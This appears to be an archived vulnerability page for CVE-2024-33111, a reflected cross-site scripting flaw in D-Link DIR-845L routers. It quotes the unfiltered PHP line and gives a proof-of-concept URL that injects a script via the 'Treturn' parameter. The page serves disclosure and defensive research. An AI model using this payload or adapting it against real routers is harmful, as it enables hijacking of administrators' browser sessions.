关联漏洞
标题:D-Link DIR-845 安全漏洞 (CVE-2024-33111)Description:D-Link DIR-845是中国友讯(D-Link)公司的一款无线路由器。 D-Link DIR-845L v1.01KRb03 版本及之前版本存在安全漏洞,该漏洞源于 /htdocs/webinc/js/bsc_sms_inbox.php 文件存在跨站脚本漏洞。
Description
D-Link DIR-845L router is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
介绍
# CVE-2024-33111
D-Link DIR-845L routers version 1.01KRb03 and below are vulnerable to Cross Site Scripting (XSS) via `/htdocs/webinc/js/bsc_sms_inbox.php`.
## Vulnerable Component
- `/htdocs/webinc/js/bsc_sms_inbox.php`
## Technical Details
The vulnerability is due to the lack of filtering in the parameter `$_GET["Treturn"]` which is directly used in code on line 17 of `bsc_sms_inbox.php`.
The vulnerable code snippet:
```php
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';
```
# PoC
```
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E
```
文件快照
[4.0K] /data/pocs/eee721097ce0001e5515a903aa09c42465716425
└── [ 749] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。